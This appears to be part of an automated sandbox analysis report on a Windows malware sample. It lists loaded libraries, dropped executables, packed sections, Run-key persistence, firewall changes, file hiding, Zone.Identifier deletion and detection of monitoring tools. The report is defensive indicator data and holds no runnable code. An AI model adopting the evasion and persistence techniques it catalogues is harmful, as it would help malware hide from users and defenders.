        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dll
        Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dll
        Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: iertutil.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile written: C:\Windows\system.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic file information: File size 2496512 > 1048576
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x24b600
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sedSmibSjDOiaD.exe, 0000002E.00000000.3877127117.0000000000A9E000.00000002.00000001.01000000.0000000A.sdmp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01443B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,1_2_01443B60
        Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: .imports
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: .themida
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: .boot
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name: .imports
        Source: jvauyc32.exe.1.drStatic PE information: section name: .themida
        Source: jvauyc32.exe.1.drStatic PE information: section name: .boot
        Source: msedge.exe.10.drStatic PE information: section name: .00cfg
        Source: msedge.exe.10.drStatic PE information: section name: .gxfg
        Source: msedge.exe.10.drStatic PE information: section name: .retplne
        Source: msedge.exe.10.drStatic PE information: section name: CPADinfo
        Source: msedge.exe.10.drStatic PE information: section name: LZMADEC
        Source: msedge.exe.10.drStatic PE information: section name: _RDATA
        Source: msedge.exe.10.drStatic PE information: section name: malloc_h
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_00AB6690 push eax; ret 1_2_00AB66BE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01448060 push eax; ret 1_2_0144808E
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_014BF200 push ss; ret 1_2_014BF204
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_014BF217 push ds; ret 1_2_014BF222
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00976690 push eax; ret 10_2_009766BE
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00D10000 push ebp; mov dword ptr [esp], eax10_2_00D1000F
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00D10000 push 5489B728h; mov dword ptr [esp], ebx10_2_00D100A6
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00411059 push esp; ret 18_2_0041105A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040E269 push esp; ret 18_2_0040E26A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00411E21 push esp; ret 18_2_00411E22
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040B030 push eax; ret 18_2_0040B05E
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040F031 push esp; ret 18_2_0040F032
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040F4C9 push esp; ret 18_2_0040F4CA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_004114F1 push esp; ret 18_2_004114F2
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00413081 push esp; ret 18_2_00413082
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00410291 push esp; ret 18_2_00410292
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_004122B9 push esp; ret 18_2_004122BA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00412751 push esp; ret 18_2_00412752
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040F961 push esp; ret 18_2_0040F962
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040E701 push esp; ret 18_2_0040E702
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00410729 push esp; ret 18_2_0041072A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00410BC1 push esp; ret 18_2_00410BC2
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00412BE9 push esp; ret 18_2_00412BEA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040FDF9 push esp; ret 18_2_0040FDFA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00411989 push esp; ret 18_2_0041198A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040EB99 push esp; ret 18_2_0040EB9A
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 41_2_007B1AB7 push ds; ret 41_2_007B1AC2
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 41_2_007B1AA0 push ss; ret 41_2_007B1AA4
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 42_2_012B1AA0 push ss; ret 42_2_012B1AA4
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 42_2_012B1AB7 push ds; ret 42_2_012B1AC2
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 43_2_00791AB7 push ds; ret 43_2_00791AC2
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: entropy: 7.9613934272864615
        Source: winfpnht.exe.1.drStatic PE information: section name: .text entropy: 7.984275082441756
        Source: winmxfy.exe.1.drStatic PE information: section name: .text entropy: 7.985345441502574
        Source: voiv.exe.1.drStatic PE information: section name: .text entropy: 7.985345441502574
        Source: jvauyc32.exe.1.drStatic PE information: section name: entropy: 7.9613934272864615
        Source: rckc.exe.10.drStatic PE information: section name: .text entropy: 7.984175636605872
        Source: winkvnav.exe.10.drStatic PE information: section name: .text entropy: 7.986568277217242
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: C:\Users\user\AppData\Local\Temp\winkvnav.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: C:\Users\user\AppData\Local\Temp\rckc.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Local\Temp\winmxfy.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Local\Temp\winfpnht.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\voiv.exeJump to dropped file

        Boot Survival

        barindex
        Monitors registry run keys for changes
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunJump to behavior
        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: RegmonClass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: FilemonClass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: Regmonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: Filemonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWindow searched: window name: Regmonclass
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run jvauyc32.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run jvauyc32.exeJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Changes the view of files in windows explorer (hidden files and folders)
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile opened: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe:Zone.Identifier read attributes | deleteJump to behavior
        May modify the system service descriptor table (often done to hook functions)
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeBinary or memory string: KeServiceDescriptorTable
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
